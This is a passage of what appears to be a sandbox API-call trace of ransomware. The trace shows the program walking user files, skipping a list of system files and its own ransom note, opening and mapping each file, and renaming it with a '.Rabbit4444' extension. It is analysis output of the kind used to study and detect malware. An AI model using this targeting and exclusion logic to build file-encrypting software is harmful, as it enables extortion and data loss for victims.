hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c524bdd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x1c524bdd, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a0254b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x55f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Accessibility_Narrator_IsEchoCharacterEnabled.settingcontent-ms", cAlternateFileName="AA0EB6~1.SET")) returned 1 [0057.012] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEchoCharacterEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.012] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEchoCharacterEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.012] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEchoCharacterEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.012] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEchoCharacterEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.012] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEchoCharacterEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.012] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEchoCharacterEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.012] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEchoCharacterEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.012] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEchoCharacterEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.012] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEchoCharacterEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.012] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEchoCharacterEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.012] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEchoCharacterEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.013] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Accessibility_Narrator_IsEchoCharacterEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEchoCharacterEnabled.settingcontent-ms") returned="AAA_SystemSettings_Accessibility_Narrator_IsEchoCharacterEnabled.settingcontent-ms" [0057.013] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsEchoCharacterEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.013] lstrlenW (lpString="AAA_SystemSettings_Accessibility_Narrator_IsEchoCharacterEnabled.settingcontent-ms") returned 82 [0057.013] lstrlenW (lpString="Rabbit4444") returned 10 [0057.013] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.013] lstrlenW (lpString=".dll") returned 4 [0057.013] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.013] lstrlenW (lpString=".lnk") returned 4 [0057.013] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.013] lstrlenW (lpString=".ini") returned 4 [0057.013] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.013] lstrlenW (lpString=".sys") returned 4 [0057.013] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.013] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsEchoCharacterEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_isechocharacterenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.013] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.013] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14832414623) returned 1 [0057.013] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1375) returned 1 [0057.014] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0057.014] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0057.014] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x860, lpName=0x0) returned 0x298 [0057.015] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x860) returned 0x70000 [0057.016] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.016] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0057.016] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.016] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0057.016] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.016] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0057.016] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.016] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0057.016] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14832676411) returned 1 [0057.016] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0057.016] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0057.016] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.016] CloseHandle (hObject=0x298) returned 1 [0057.016] CloseHandle (hObject=0x278) returned 1 [0057.016] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsEchoCharacterEnabled.settingcontent-ms.Rabbit4444") returned 210 [0057.016] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsEchoCharacterEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_isechocharacterenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsEchoCharacterEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_isechocharacterenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.017] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c6a224a, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x1c6a224a, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2340c766, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x546, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Accessibility_Narrator_IsEchoWordEnabled.settingcontent-ms", cAlternateFileName="AA16CC~1.SET")) returned 1 [0057.017] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEchoWordEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.017] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEchoWordEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.017] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEchoWordEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.017] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEchoWordEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.017] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEchoWordEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.017] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEchoWordEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.017] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEchoWordEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.017] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEchoWordEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.017] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEchoWordEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.017] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEchoWordEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.017] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEchoWordEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.017] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Accessibility_Narrator_IsEchoWordEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEchoWordEnabled.settingcontent-ms") returned="AAA_SystemSettings_Accessibility_Narrator_IsEchoWordEnabled.settingcontent-ms" [0057.017] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsEchoWordEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.018] lstrlenW (lpString="AAA_SystemSettings_Accessibility_Narrator_IsEchoWordEnabled.settingcontent-ms") returned 77 [0057.018] lstrlenW (lpString="Rabbit4444") returned 10 [0057.018] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.018] lstrlenW (lpString=".dll") returned 4 [0057.018] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.018] lstrlenW (lpString=".lnk") returned 4 [0057.018] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.018] lstrlenW (lpString=".ini") returned 4 [0057.018] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.018] lstrlenW (lpString=".sys") returned 4 [0057.018] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.018] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsEchoWordEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_isechowordenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.018] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.018] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14832904537) returned 1 [0057.018] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1350) returned 1 [0057.018] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0057.018] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0057.018] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x850, lpName=0x0) returned 0x298 [0057.020] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x850) returned 0x70000 [0057.021] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.021] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0057.021] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.021] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0057.021] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.021] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0057.021] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.022] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0057.022] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14833233004) returned 1 [0057.022] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0057.022] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0057.022] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.022] CloseHandle (hObject=0x298) returned 1 [0057.022] CloseHandle (hObject=0x278) returned 1 [0057.022] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsEchoWordEnabled.settingcontent-ms.Rabbit4444") returned 205 [0057.022] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsEchoWordEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_isechowordenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsEchoWordEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_isechowordenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.023] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cefa67c, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x1cefa67c, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2398fe3f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x519, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Accessibility_Narrator_IsEnabled.settingcontent-ms", cAlternateFileName="AAD6FB~1.SET")) returned 1 [0057.023] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.023] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.023] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.023] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.023] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.023] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.023] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.023] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.023] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.023] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.023] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.023] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Accessibility_Narrator_IsEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Accessibility_Narrator_IsEnabled.settingcontent-ms") returned="AAA_SystemSettings_Accessibility_Narrator_IsEnabled.settingcontent-ms" [0057.023] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.023] lstrlenW (lpString="AAA_SystemSettings_Accessibility_Narrator_IsEnabled.settingcontent-ms") returned 69 [0057.023] lstrlenW (lpString="Rabbit4444") returned 10 [0057.023] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.023] lstrlenW (lpString=".dll") returned 4 [0057.023] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.023] lstrlenW (lpString=".lnk") returned 4 [0057.023] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.023] lstrlenW (lpString=".ini") returned 4 [0057.023] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.024] lstrlenW (lpString=".sys") returned 4 [0057.024] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.024] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_isenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.024] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.024] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14833460577) returned 1 [0057.024] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1305) returned 1 [0057.024] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0057.024] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0057.024] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x820, lpName=0x0) returned 0x298 [0057.025] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820) returned 0x70000 [0057.026] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.026] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0057.026] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.026] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0057.026] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.026] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0057.026] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.026] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0057.026] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14833707753) returned 1 [0057.026] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0057.026] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0057.026] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.027] CloseHandle (hObject=0x298) returned 1 [0057.027] CloseHandle (hObject=0x278) returned 1 [0057.027] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsEnabled.settingcontent-ms.Rabbit4444") returned 197 [0057.027] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_isenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_isenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.028] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d02b92e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x1d02b92e, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23458c07, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x55b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Accessibility_Narrator_IsFastKeyEntryEnabled.settingcontent-ms", cAlternateFileName="AAFD0D~1.SET")) returned 1 [0057.028] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsFastKeyEntryEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.028] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsFastKeyEntryEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.028] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsFastKeyEntryEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.028] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsFastKeyEntryEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.028] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsFastKeyEntryEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.028] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsFastKeyEntryEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.028] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsFastKeyEntryEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.028] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsFastKeyEntryEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.028] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsFastKeyEntryEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.028] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsFastKeyEntryEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.028] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsFastKeyEntryEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.028] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Accessibility_Narrator_IsFastKeyEntryEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Accessibility_Narrator_IsFastKeyEntryEnabled.settingcontent-ms") returned="AAA_SystemSettings_Accessibility_Narrator_IsFastKeyEntryEnabled.settingcontent-ms" [0057.028] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsFastKeyEntryEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.028] lstrlenW (lpString="AAA_SystemSettings_Accessibility_Narrator_IsFastKeyEntryEnabled.settingcontent-ms") returned 81 [0057.028] lstrlenW (lpString="Rabbit4444") returned 10 [0057.028] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.028] lstrlenW (lpString=".dll") returned 4 [0057.028] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.029] lstrlenW (lpString=".lnk") returned 4 [0057.029] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.029] lstrlenW (lpString=".ini") returned 4 [0057.029] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.029] lstrlenW (lpString=".sys") returned 4 [0057.029] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.029] CreateFileW 